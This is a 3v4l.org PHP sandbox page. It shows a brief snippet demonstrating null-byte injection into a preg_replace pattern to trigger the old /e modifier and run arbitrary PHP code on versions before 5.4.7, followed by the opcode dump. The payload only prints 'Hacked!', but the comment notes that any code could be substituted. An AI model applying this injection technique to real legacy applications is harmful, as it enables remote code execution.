3v4l.org

run code in 500+ PHP versions simultaneously
<?php // That works on PHP versions earlier than 5.4.7. $replace_pattern = "a@e\0"; // Inject null byte here. $replace = 'print "Hacked!"'; // Any valid PHP Code. $transliterated = 'a'; $transliterated = preg_replace('@' . $replace_pattern . '@', $replace, $transliterated);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/YvY2J
function name:  (null)
number of ops:  9
compiled vars:  !0 = $replace_pattern, !1 = $replace, !2 = $transliterated
line      #* E I O op                               fetch          ext  return  operands
-----------------------------------------------------------------------------------------
    3     0  E >   ASSIGN                                                       !0, 'a%40e%00'
    4     1        ASSIGN                                                       !1, 'print+%22Hacked%21%22'
    5     2        ASSIGN                                                       !2, 'a'
    7     3        CONCAT                                               ~6      '%40', !0
          4        CONCAT                                               ~7      ~6, '%40'
          5        FRAMELESS_ICALL_3                preg_replace        ~8      ~7, !1
          6        OP_DATA                                                      !2
          7        ASSIGN                                                       !2, ~8
          8      > RETURN                                                       1

Generated using Vulcan Logic Dumper, using php 8.5.0

preferences:
241.92 ms | 2946 KiB | 13 Q